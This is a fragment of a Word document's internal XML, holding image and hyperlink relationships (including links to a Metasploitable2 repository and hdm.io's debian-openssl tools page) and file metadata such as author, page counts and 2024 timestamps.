Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpg"/><Relationship Id="rId94"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38.jpe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hyperlink" Target="https://hdm.io/tools/debian-openssl/" TargetMode="Externa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56.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39.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rich98/Metasploitable2" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId93"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44</Pages>
  <Words>3310</Words>
  <Characters>23759</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>791</Lines>
  <Paragraphs>644</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>26425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wadsworth</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Richard Wadsworth</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-02T13:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-02T15:00:00Z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f9886a90-4749-429b-bb66-aeff8532d181</vt:lpwstr>
  </property>
</Properties>
</file>